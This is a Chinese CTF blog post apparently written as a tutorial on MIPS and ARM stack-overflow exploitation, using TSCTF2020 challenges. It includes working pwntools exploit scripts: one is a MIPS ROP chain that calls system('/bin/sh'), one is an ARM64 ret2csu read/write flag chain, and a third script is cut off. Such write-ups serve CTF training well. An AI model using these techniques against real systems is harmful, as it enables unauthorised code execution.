

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;light&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://gitee.com/wang842948487/IMGbase/raw/master/img/20201030172922.png">
  <link rel="icon" type="image/png" href="https://gitee.com/wang842948487/IMGbase/raw/master/img/20201030172922.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="A Wild IronMan who is learning how to create his Jarvis.">
  <meta name="author" content="N1K0_">
  <meta name="keywords" content="">
  <title>异构 PWN 0x2 入门 - N1K0_  Blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.0.0/styles/monokai-sublime.min.css" />
    
  

  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>N1K0_'s Workshop</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                友链
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('https://gitee.com/wang842948487/IMGbase/raw/master/img/20201112224521.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="container page-header text-center fade-in-up">
            <span class="h2" id="subtitle">
              
            </span>

            
              <div class="mt-3">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-author" aria-hidden="true"></i>
      N1K0_
    </span>
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-11-12 00:30" pubdate>
        2020年11月12日 凌晨
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      3.4k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      50
       分钟
    </span>
  

  
  
    
      <!-- LeanCloud 统计文章PV -->
      <span id="leancloud-post-views-container" class="post-meta" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="leancloud-post-views"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto" id="post">
            <!-- SEO header -->
            <h1 style="display: none">异构 PWN 0x2 入门</h1>
            
            <div class="markdown-body" id="post-body">
              <h1 id="异构-PWN-0x2-入门"><a href="#异构-PWN-0x2-入门" class="headerlink" title="异构 PWN 0x2 入门"></a>异构 PWN 0x2 入门</h1><blockquote>
<p>本文以TFCTF2020中的题目为例，介绍常规mips和arm题目的解法和思路</p>
<p>其中部分内容参考了绿油油刘的博客<a target="_blank" rel="noopener" href="https://www.lyyl.online/2020/10/22/Arm-Pwn-%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA%E5%8F%8A%E8%B0%83%E8%AF%95/">ARM环境搭建</a></p>
</blockquote>
<h2 id="MIPS"><a href="#MIPS" class="headerlink" title="MIPS"></a>MIPS</h2><h3 id="汇编指令"><a href="#汇编指令" class="headerlink" title="汇编指令"></a>汇编指令</h3><p>mips汇编指令可查阅以下网站</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/CoBrAMG/p/9237609.html">https://www.cnblogs.com/CoBrAMG/p/9237609.html</a></p>
<h3 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h3><p>本题程序为32位MIPSEL架构动态链接</p>
<p>查看发现没有开启任何保护，但是<code>checksec</code>对异构程序的检测有时可能会不准确，因此还是考虑通过<code>rop</code>来<code>getshell</code></p>
<p><img src="https://gitee.com/wang842948487/IMGbase/raw/master/img/20201018232455.png" srcset="/img/loading.gif" alt="image-20201018232455015"></p>
<p>通过IDA发现该程序流程几乎和<code>HelloARM</code>一样，但程序中调用了<code>system</code>函数并且输出了其地址</p>
<p><img src="https://gitee.com/wang842948487/IMGbase/raw/master/img/20201018233031.png" srcset="/img/loading.gif" alt="image-20201018233031230"></p>
<p>程序的溢出点在<code>read</code>处，偏移可以通过<code>pwntools</code>中的<code>cyclic</code>爆破，也可以通过静态分析得到，如图</p>
<p>程序首先将返回值<code>$ra</code>存入栈顶指针<code>$sp + 0x11c </code>处，栈基指针<code>$fp</code>存入<code>$sp + 0x118</code>处，之后将<code>$sp</code>赋值给<code>$fp</code></p>
<p><img src="https://gitee.com/wang842948487/IMGbase/raw/master/img/20201018233519.png" srcset="/img/loading.gif" alt="image-20201018233519584"></p>
<p>之后在进行<code>read</code>时, 其实的写入位置是<code>$fp + 0x18</code>, 因此最后的偏移就是<code>offset = 0x11c - 0x18 = 0x104</code></p>
<p><img src="https://gitee.com/wang842948487/IMGbase/raw/master/img/20201018234623.png" srcset="/img/loading.gif" alt="image-20201018234623210"></p>
<p>之后只需要找一个适合的<code>gadget</code>即可<code>get shell</code></p>
<p>在这里我通过<code>ropper</code>找到了这个地址</p>
<p><code>0x0000b114: lw $t9, ($sp); lw $a0, 4($sp); jalr $t9; nop;</code></p>
<p>之后在程序执行过程中向<code>name</code>写入<code>/bin/sh</code></p>
<p>并在溢出后的栈上依次布置好<code>system_addr</code>以及<code>name_addr</code>即可</p>
<p><strong>注:   由于这里我找到的<code>gadget</code>比较好, 因此没出现什么问题, 但在做<code>ARM</code>或者<code>MIPS</code>架构题目时容易出现栈位置变化导致攻击失败的情况, 此时可以考虑利用<code>喷射</code>的思想,在栈上布置满<code>name_addr</code>, 问题就有可能得以解决</strong></p>
<p>EXP：</p>
<div class="hljs"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python</span>
<span class="hljs-comment">#coding=utf-8</span>
<span class="hljs-comment">#__author__: N1K0_</span>

<span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *
<span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> LibcSearcher
<span class="hljs-keyword">import</span> inspect
<span class="hljs-keyword">from</span> sys <span class="hljs-keyword">import</span> argv

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">ret2libc</span>(<span class="hljs-params">leak, func, path=<span class="hljs-string">&#x27;&#x27;</span></span>):</span>
    <span class="hljs-keyword">if</span> path == <span class="hljs-string">&#x27;&#x27;</span>:
        libc = LibcSearcher(func, leak)
        base = leak - libc.dump(func)
        system = base + libc.dump(<span class="hljs-string">&#x27;system&#x27;</span>)
        binsh = base + libc.dump(<span class="hljs-string">&#x27;str_bin_sh&#x27;</span>)
    <span class="hljs-keyword">else</span>:
        libc = ELF(path)
        base = leak - libc.sym[func]
        system = base + libc.sym[<span class="hljs-string">&#x27;system&#x27;</span>]
        binsh = base + <span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">b&#x27;/bin/sh&#x27;</span>))
    <span class="hljs-keyword">return</span> (base, system, binsh,)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">leak</span>(<span class="hljs-params">var</span>):</span>
    callers_local_vars = inspect.currentframe().f_back.f_locals.items()
    temp =  [var_name <span class="hljs-keyword">for</span> var_name, var_val <span class="hljs-keyword">in</span> callers_local_vars <span class="hljs-keyword">if</span> var_val <span class="hljs-keyword">is</span> var][<span class="hljs-number">0</span>]
    p.info(temp + <span class="hljs-string">&#x27;: &#123;:#x&#125;&#x27;</span>.<span class="hljs-built_in">format</span>(var))

s      = <span class="hljs-keyword">lambda</span> data               :p.send(data) 
sa      = <span class="hljs-keyword">lambda</span> delim,data         :p.sendafter(delim, data)
sl      = <span class="hljs-keyword">lambda</span> data               :p.sendline(data)
sla     = <span class="hljs-keyword">lambda</span> delim,data         :p.sendlineafter(delim, data)
r      = <span class="hljs-keyword">lambda</span> numb=<span class="hljs-number">4096</span>          :p.recv(numb)
ru      = <span class="hljs-keyword">lambda</span> delims, drop=<span class="hljs-literal">True</span>  :p.recvuntil(delims, drop)
uu32    = <span class="hljs-keyword">lambda</span> data               :u32(data.ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b&#x27;\0&#x27;</span>))
uu64    = <span class="hljs-keyword">lambda</span> data               :u64(data.ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&#x27;\0&#x27;</span>))
plt     = <span class="hljs-keyword">lambda</span> data               :elf.plt[data]
got     = <span class="hljs-keyword">lambda</span> data               :elf.got[data]
sym     = <span class="hljs-keyword">lambda</span> data               :libc.sym[data]
itr     = <span class="hljs-keyword">lambda</span>                    :p.interactive()

local_libc  = <span class="hljs-string">&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;</span>
local_libc_32 = <span class="hljs-string">&#x27;/lib/i386-linux-gnu/libc.so.6&#x27;</span>
remote_libc = <span class="hljs-string">&#x27;&#x27;</span>
binary = <span class="hljs-string">&#x27;./HelloMIPS&#x27;</span>

elf = ELF(binary,checksec=<span class="hljs-literal">False</span>)
libc = ELF(<span class="hljs-string">&#x27;./lib/libuClibc-0.9.30.1.so&#x27;</span>)

p = process([<span class="hljs-string">&quot;qemu-mipsel-static&quot;</span>, <span class="hljs-string">&quot;-g&quot;</span>, <span class="hljs-string">&quot;1234&quot;</span>,<span class="hljs-string">&quot;./HelloMIPS&quot;</span>])
<span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(argv) &gt; <span class="hljs-number">1</span>:
    <span class="hljs-keyword">if</span> argv[<span class="hljs-number">1</span>]==<span class="hljs-string">&#x27;r&#x27;</span>:
        p = remote(<span class="hljs-string">&#x27;10.104.255.211&#x27;</span>,<span class="hljs-number">7777</span>)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">dbg</span>(<span class="hljs-params">cmd=<span class="hljs-string">&#x27;&#x27;</span></span>):</span>
    os.system(<span class="hljs-string">&#x27;tmux set mouse on&#x27;</span>)
    context.terminal = [<span class="hljs-string">&#x27;tmux&#x27;</span>,<span class="hljs-string">&#x27;splitw&#x27;</span>,<span class="hljs-string">&#x27;-h&#x27;</span>]
    gdb.attach(p,cmd)
    pause()

<span class="hljs-comment"># start </span>
context.log_level = <span class="hljs-string">&#x27;DEBUG&#x27;</span>
<span class="hljs-comment"># 0x0001d600: lw $t9, 0x40($sp); nop; jalr $t9; nop; </span>
<span class="hljs-comment"># 0x0000b114: lw $t9, ($sp); lw $a0, 4($sp); jalr $t9; nop;</span>
pause()
sla(<span class="hljs-string">&#x27;EL.\n&#x27;</span>,<span class="hljs-string">&#x27;/bin/sh\x00&#x27;</span>)
ru(<span class="hljs-string">&#x27;ber:&#x27;</span>)
magic = <span class="hljs-built_in">int</span>(ru(<span class="hljs-string">&#x27;\n&#x27;</span>),<span class="hljs-number">16</span>)
base = magic - sym(<span class="hljs-string">&#x27;system&#x27;</span>)
one = base+ <span class="hljs-number">0xb114</span>
name = <span class="hljs-number">0x440E20</span>
leak(magic)
leak(base)
leak(one)
pause()
pl = <span class="hljs-string">&#x27;/bin/sh\00&#x27;</span>.ljust(<span class="hljs-number">0x104</span>,<span class="hljs-string">&#x27;a&#x27;</span>) + p32(one) + p32(magic) + p32(name)
s(pl)
<span class="hljs-comment"># end</span>
itr()</code></pre></div>





<h2 id="ARM"><a href="#ARM" class="headerlink" title="ARM"></a>ARM</h2><h3 id="汇编指令-1"><a href="#汇编指令-1" class="headerlink" title="汇编指令"></a>汇编指令</h3><p><code>32</code>位下</p>
<ul>
<li><p><code>arm32</code> 只有 <code>16</code> 个 <code>32bit</code> 的通用寄存器 <code>r0</code>~<code>r12</code> , <code>lr</code>, <code>pc</code>, <code>sp</code></p>
</li>
<li><p><code>arm32</code>用四个寄存器即<code>r0-r3</code>传递前四个参数，被调用的子函数返回前无需恢复<code>r0-r3</code>内容，<code>r0</code>被用来存储函数调用的返回值。使用寄存器<code>r4-r11</code>来保存局部变量。如果子程序中使用了这些寄存器，那么在进入时需要保存这些寄存器的值，并在返回时恢复这些寄存器的值。<code>r7</code>经常用来存储系统调用号，<code>r11</code>存放着栈帧边界的值<code>fp(ebp)</code>。</p>
</li>
<li><p><code>r13</code>用作堆栈指针，记作<code>sp</code>，在子程序中<code>r13</code>不能用作其他的用途，进入子程序和返回子程序中<code>sp</code>的值必须相等。也就是说函数的栈帧由<code>fp,sp</code>来指定边界。</p>
<p><img src="https://gitee.com/wang842948487/IMGbase/raw/master/img/20201112221821.png" srcset="/img/loading.gif" alt="图片无法显示，请联系作者"></p>
</li>
</ul>
<ul>
<li><p><code>r14</code>用来保存返回地址记作<code>LR</code>，如果子程序中保存了返回地址，那么<code>r14</code>可以用作其他的用途。</p>
</li>
<li><p><code>r15</code>是程序计数器<code>PC</code>。在程序执行过程中，<code>ARM</code>模式下存储当前指令<code>+8</code>也就是两条<code>ARM</code>指令之后的位置，<code>Thumb(v1)</code>模式下<code>PC</code>存储着当前指令<code>+4</code>即两条<code>Thumb</code>指令之后的地址。</p>
</li>
<li><p><code>32</code>位下堆栈操作是<code>8</code>字节对齐的，常用到的指令是<code>STMFD,LDFMD</code>。<code>STMFD SP! ,&#123;R0-R7，LR&#125;</code>该指令是将<code>R0-R7,LR</code>寄存器中的值依次压栈，最后<code>sp</code>指向的是栈顶的位置，也就是<code>LR</code>的值所在的位置。<code>STMFD SP ,&#123;R0-R7，LR&#125;</code>指令中<code>sp</code>会在压完参数之后回到原位，不会改变<code>sp</code>的值。</p>
<p>也就是说<code>!</code>表示的是当数据传输完毕之后更新寄存器的值。否则寄存器的值不变。</p>
</li>
<li><p>如果程序中进行了外部调用，则必须满足下面两点，一个是外部接口的堆栈必须是<code>8</code>字节对齐的，汇编程序中使用<code>PRESERVE8</code>伪指令来告诉连接器，汇编程序是<code>8</code>字节对齐的。</p>
</li>
<li><p><code>LDR</code>指令通常用来从内存中加载数据，<code>STR</code>指令则被用作将寄存器的值存放到内存中。</p>
<div class="hljs"><pre><code class="hljs x86asm"><span class="hljs-keyword">str</span> <span class="hljs-built_in">r2</span>, [<span class="hljs-built_in">r1</span>, #<span class="hljs-number">2</span>]  @ 取址模式：基于偏移量。<span class="hljs-built_in">R2</span>寄存器中的值<span class="hljs-number">0x3</span>被存放到<span class="hljs-built_in">R1</span>寄存器的值加<span class="hljs-number">2</span>所指向地址处。
<span class="hljs-keyword">str</span> <span class="hljs-built_in">r2</span>, [<span class="hljs-built_in">r1</span>, <span class="hljs-built_in">r2</span>, <span class="hljs-keyword">LSL</span>#<span class="hljs-number">2</span>]  @ 取址模式：基于偏移量。<span class="hljs-built_in">R2</span>寄存器中的值<span class="hljs-number">0x3</span>被存放到<span class="hljs-built_in">R1</span>寄存器的值加(左移两位后的<span class="hljs-built_in">R2</span>寄存器的值)所指向地址处。<span class="hljs-built_in">R1</span>寄存器不会被修改。
<span class="hljs-keyword">str</span> <span class="hljs-built_in">r2</span>, [<span class="hljs-built_in">r1</span>, <span class="hljs-built_in">r2</span>, <span class="hljs-keyword">LSL</span>#<span class="hljs-number">2</span>]! @ 取址模式：基于索引前置修改。<span class="hljs-built_in">R2</span>寄存器中的值<span class="hljs-number">0x3</span>被存放到<span class="hljs-built_in">R1</span>寄存器的值加(左移两位后的<span class="hljs-built_in">R2</span>寄存器的值)所指向地址处，之后<span class="hljs-built_in">R1</span>寄存器中的值被更新,也就<span class="hljs-built_in">R1</span> = <span class="hljs-built_in">R1</span> + <span class="hljs-built_in">R2</span>&lt;&lt;<span class="hljs-number">2</span>。
ldr <span class="hljs-built_in">r3</span>, [<span class="hljs-built_in">r1</span>], <span class="hljs-built_in">r2</span>, <span class="hljs-keyword">LSL</span>#<span class="hljs-number">2</span>  @ 取址模式：基于索引后置修改。<span class="hljs-built_in">R3</span>寄存器中的值是从<span class="hljs-built_in">R1</span>寄存器的值所指向的地址中加载的，加载之后<span class="hljs-built_in">R1</span>寄存器中的值被更新也就是<span class="hljs-built_in">R1</span> = <span class="hljs-built_in">R1</span> + <span class="hljs-built_in">R2</span>&lt;&lt;<span class="hljs-number">2</span>。</code></pre></div>
</li>
<li><p><code>B</code>简单的跳转功能，（分支链接）<code>BL</code>将<code>PC+4</code>保存为<code>LR</code>并跳转至目标地址（由于叶子函数不会改变<code>LR</code>寄存器的值，因此叶子函数可以直接通过<code>LR</code>寄存器进行返回），（分支交换）<code>BX</code>和分支链接交换<code>BLX</code>用于将指令集从<code>ARM</code>交换到<code>Thumb</code>。</p>
</li>
</ul>
<p><code>64</code>位下<code>AArch40</code></p>
<ul>
<li><p><code>arm64</code>有<code>32</code>个<code>64bit</code>长度的通用寄存器<code>x0-x30</code>以及<code>sp</code>，可以用<code>w0-w30</code>访问寄存器中的<code>4</code>字节</p>
</li>
<li><p><code>arm64</code>用八个寄存器即<code>x0-x7</code>传递前八个参数</p>
</li>
<li><p><code>R30</code>也就是<code>LR</code>，保存返回地址，<code>R29</code>也就是<code>FP</code>，保存函数栈的基址，在一些情况下返回值是通过<code>R8</code>返回的。</p>
</li>
<li><p>除了批量加载指令<code>LDM/STM,PUSH/POP</code>，使用<code>STP/LDP</code>对加载指令的寄存器进行替换。常见的内存读写指令有</p>
<p><code>LDR，LDRB，LDRSB，LDRH，LDRSW，STR，STRB，STRH</code></p>
<p>此处<code>R – Register</code>(寄存器)、<code>B – Byte</code>(字节-8bit)、<code>SB – Signed Byte</code>(有符号字节)、<code>RH – Half Word</code>(半字-<code>16bit</code>)、<code>SW- Signed Word</code>(带符号字-<code>32bit</code>)。</p>
</li>
<li><p><code>64</code>位中取消了<code>32</code>位下的一些指令，如<code>vswp</code>指令，条件执行指令<code>subgt,addle</code>等。<code>mov r2, r1, lsl #2</code>仅在<code>ARM32</code>下支持，它等同于<code>ARM64</code>的<code>lsl r2, r1, #2</code></p>
</li>
</ul>
<p><code>ARM 32</code>和<code>ARM64</code>常用指令的对应情况。</p>
<p><a target="_blank" rel="noopener" href="https://image.lyyl.online/images/2020/10/23/20201023104622.png"><img src="https://gitee.com/wang842948487/IMGbase/raw/master/img/20201112221811.png" srcset="/img/loading.gif" alt="图片无法显示，请联系作者"></a></p>
<h3 id="例题-1"><a href="#例题-1" class="headerlink" title="例题"></a>例题</h3><h4 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h4><p>两个题目时一个<code>binary</code>，区别就是第一个是直接通过<code>orw</code>读取<code>flag</code>的内容，因为程序一开始已经<code>open(&quot;./flag&quot;)</code>，第二个则<code>flag</code>文件名称未知，需要<code>getshell</code>才能够获取得到<code>flag</code>。两种方法都是执行<code>rop</code>。</p>
<p>程序很明显的存在栈溢出。这里的<code>gadget</code>我们选择的是<code>ret2csu</code>也就是使用的是<code>libc_csu_init</code>中的函数调用链，这个和<code>linux</code>下的相同。</p>
<p>这里可以先通过ida来了解一下arm架构的特点,</p>
<p>可以看到 arm程序的栈基址和返回值是存在函数空间的<code>地地址位</code>上的, 也就是说, 我们无法通过栈溢出来覆盖当前函数的返回值,</p>
<p>只能去覆盖其母函数(main函数)的返回值</p>
<p><img src="https://gitee.com/wang842948487/IMGbase/raw/master/img/20201112222758.png" srcset="/img/loading.gif" alt="image-20201112222758407"></p>
<p>第二个点是arm在执行跳转指令<code> BLR X3</code>时, 实际上跳转的目标是x3寄存器中值指向的地址的值,  不注意的话很容易会出错</p>
<p>题目本身的利用部分并不难,一些涉及到地址的内容如果嫌麻烦不想算的话,可以直接通过<code>pwndbg的search</code>来搜索目标地址/字符串所在的地址, 再计算其与栈地址的差值即可</p>
<h3 id="EXP"><a href="#EXP" class="headerlink" title="EXP"></a>EXP</h3><p>ORW</p>
<div class="hljs"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python</span>
<span class="hljs-comment">#coding=utf-8</span>
<span class="hljs-comment">#__author__:NightK1n9_</span>

<span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *
<span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> LibcSearcher
<span class="hljs-keyword">import</span> inspect
<span class="hljs-keyword">from</span> sys <span class="hljs-keyword">import</span> argv

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">ret2libc</span>(<span class="hljs-params">leak, func, path=<span class="hljs-string">&#x27;&#x27;</span></span>):</span>
    <span class="hljs-keyword">if</span> path == <span class="hljs-string">&#x27;&#x27;</span>:
        libc = LibcSearcher(func, leak)
        base = leak - libc.dump(func)
        system = base + libc.dump(<span class="hljs-string">&#x27;system&#x27;</span>)
        binsh = base + libc.dump(<span class="hljs-string">&#x27;str_bin_sh&#x27;</span>)
    <span class="hljs-keyword">else</span>:
        libc = ELF(path)
        base = leak - libc.sym[func]
        system = base + libc.sym[<span class="hljs-string">&#x27;system&#x27;</span>]
        binsh = base + <span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">b&#x27;/bin/sh&#x27;</span>))
    <span class="hljs-keyword">return</span> (base, system, binsh,)

<span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">leak</span>(<span class="hljs-params">var</span>):</span>
    callers_local_vars = inspect.currentframe().f_back.f_locals.items()
    temp =  [var_name <span class="hljs-keyword">for</span> var_name, var_val <span class="hljs-keyword">in</span> callers_local_vars <span class="hljs-keyword">if</span> var_val <span class="hljs-keyword">is</span> var][<span class="hljs-number">0</span>]
    p.info(temp + <span class="hljs-string">&#x27;: &#123;:#x&#125;&#x27;</span>.<span class="hljs-built_in">format</span>(var))

s      = <span class="hljs-keyword">lambda</span> data               :p.send(data) 
sa      = <span class="hljs-keyword">lambda</span> delim,data         :p.sendafter(delim, data)
sl      = <span class="hljs-keyword">lambda</span> data               :p.sendline(data)
sla     = <span class="hljs-keyword">lambda</span> delim,data         :p.sendlineafter(delim, data)
r      = <span class="hljs-keyword">lambda</span> numb=<span class="hljs-number">4096</span>          :p.recv(numb)
ru      = <span class="hljs-keyword">lambda</span> delims, drop=<span class="hljs-literal">True</span>  :p.recvuntil(delims, drop)
uu32    = <span class="hljs-keyword">lambda</span> data               :u32(data.ljust(<span class="hljs-number">4</span>, <span class="hljs-string">b&#x27;\0&#x27;</span>))
uu64    = <span class="hljs-keyword">lambda</span> data               :u64(data.ljust(<span class="hljs-number">8</span>, <span class="hljs-string">b&#x27;\0&#x27;</span>))
plt     = <span class="hljs-keyword">lambda</span> data               :elf.plt[data]
got     = <span class="hljs-keyword">lambda</span> data               :elf.got[data]
sym     = <span class="hljs-keyword">lambda</span> data               :libc.sym[data]
itr     = <span class="hljs-keyword">lambda</span>                    :p.interactive()

binary = <span class="hljs-string">&#x27;./HelloARM&#x27;</span>
context.binary = binary

elf = ELF(binary,checksec=<span class="hljs-literal">False</span>)
libc = elf.libc
<span class="hljs-comment"># p = process(&#x27;./HelloARM&#x27;)</span>
<span class="hljs-comment"># p = process([&quot;qemu-aarch64&quot;,&quot;-L&quot;,&quot;/home/wang/workshop/CTF/exec/my_race/2020/tsctf/3&quot;,&quot;./HelloARM&quot;])</span>
context.terminal = [<span class="hljs-string">&#x27;tmux&#x27;</span>,<span class="hljs-string">&#x27;splitw&#x27;</span>,<span class="hljs-string">&#x27;-h&#x27;</span>]
<span class="hljs-comment"># cmd = &#x27;b *0x400ad0\n&#x27;</span>
cmd = <span class="hljs-string">&#x27;b *0x400ab0\n&#x27;</span>
p = gdb.debug(context.binary.path,cmd)

<span class="hljs-keyword">if</span> <span class="hljs-built_in">len</span>(argv) &gt; <span class="hljs-number">1</span>:
    <span class="hljs-keyword">if</span> argv[<span class="hljs-number">1</span>]==<span class="hljs-string">&#x27;r&#x27;</span>:
        <span class="hljs-comment"># p = remote(&#x27;10.104.255.211&#x27;,7777)</span>
        p = remote(<span class="hljs-string">&#x27;127.0.0.1&#x27;</span>,<span class="hljs-number">10003</span>)


<span class="hljs-comment"># start </span>
context.log_level = <span class="hljs-string">&#x27;DEBUG&#x27;</span>

<span class="hljs-comment"># --------------------------------- 1 接收栈地址</span>
ru(<span class="hljs-string">&quot;number:&quot;</span>)
magic = <span class="hljs-built_in">int</span>(r(<span class="hljs-number">12</span>),<span class="hljs-number">16</span>)
leak(magic)
target = <span class="hljs-number">0x411080</span>+<span class="hljs-number">0x200</span>
read_plt = plt(<span class="hljs-string">&#x27;read&#x27;</span>)
write_plt = plt(<span class="hljs-string">&#x27;write&#x27;</span>)
sla(<span class="hljs-string">&#x27;name:&#x27;</span>,<span class="hljs-string">&#x27;wang&#x27;</span>)

<span class="hljs-comment"># ----------------------------------- 2 利用ret2csu执行orw</span>
<span class="hljs-comment"># padding</span>
pl = <span class="hljs-string">&#x27;a&#x27;</span>*<span class="hljs-number">0x100</span>
<span class="hljs-comment"># 填充main函数的栈基址和返回值地址   ret2csu</span>
pl+= p64(magic)+p64(<span class="hljs-number">0x400ad0</span>)
<span class="hljs-comment"># 因为‘ooooooo’函数返回时令sp+0x110 因此要先填充</span>
<span class="hljs-comment"># x19 &amp; padding</span>
pl+= (p64(read_plt)+p64(write_plt)).ljust(<span class="hljs-number">0x20</span>,<span class="hljs-string">&#x27;a&#x27;</span>) + p64(<span class="hljs-number">0</span>) +<span class="hljs-string">&#x27;&#x27;</span>.ljust(<span class="hljs-number">0xe8</span>,<span class="hljs-string">&#x27;a&#x27;</span>)
<span class="hljs-comment"># 根据ret2csu进行构造</span>
<span class="hljs-string">&#x27;&#x27;&#x27;</span>
<span class="hljs-string">x19 = 0</span>
<span class="hljs-string">x20 = 1</span>
<span class="hljs-string">x21 = call</span>
<span class="hljs-string">x22 = arg1</span>
<span class="hljs-string">x23 = arg2</span>
<span class="hljs-string">x24 = arg3</span>
<span class="hljs-string">&#x27;&#x27;&#x27;</span>
<span class="hljs-comment"># 基址和返回值地址（需要可读地址）</span>
pl+= p64(magic) + p64(<span class="hljs-number">0x400ab0</span>)
<span class="hljs-comment"># padding and x20</span>
pl+= p64(<span class="hljs-number">0</span>) + p64(<span class="hljs-number">1</span>) 
<span class="hljs-comment"># read(3,target,0x20)</span>
<span class="hljs-comment"># 要注意csu中取的是x21中地址的值</span>
pl+= p64(magic<span class="hljs-number">-0x10</span>) + p64(<span class="hljs-number">5</span>) + p64(magic+<span class="hljs-number">0x520</span>) + p64(<span class="hljs-number">0x20</span>)
<span class="hljs-comment"># 第二轮</span>
<span class="hljs-comment"># 栈基址 返回值</span>
pl+= p64(magic) + p64(<span class="hljs-number">0x400ab0</span>)
<span class="hljs-comment"># padding and x2</span>
pl+= p64(<span class="hljs-number">0</span>) + p64(<span class="hljs-number">1</span>) 
<span class="hljs-comment"># write(1,target,0x20)</span>
pl+= p64(magic<span class="hljs-number">-0x8</span>) + p64(<span class="hljs-number">1</span>) + p64(magic+<span class="hljs-number">0x520</span>) + p64(<span class="hljs-number">0x20</span>)
sa(<span class="hljs-string">&#x27;message:&#x27;</span>,pl)

itr()</code></pre></div>

<p>system</p>
<div class="hljs"><pre><code class="hljs python"><span class="hljs-comment">#!/usr/bin/python</span>
<span class="hljs-comment">#coding=utf-8</span>
<span class="hljs-comment">#__author__:NightK1n9_</span>

<span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *
<span class="hljs-keyword">from</span> LibcSearcher <span class="hljs-keyword">import</span> LibcSearcher
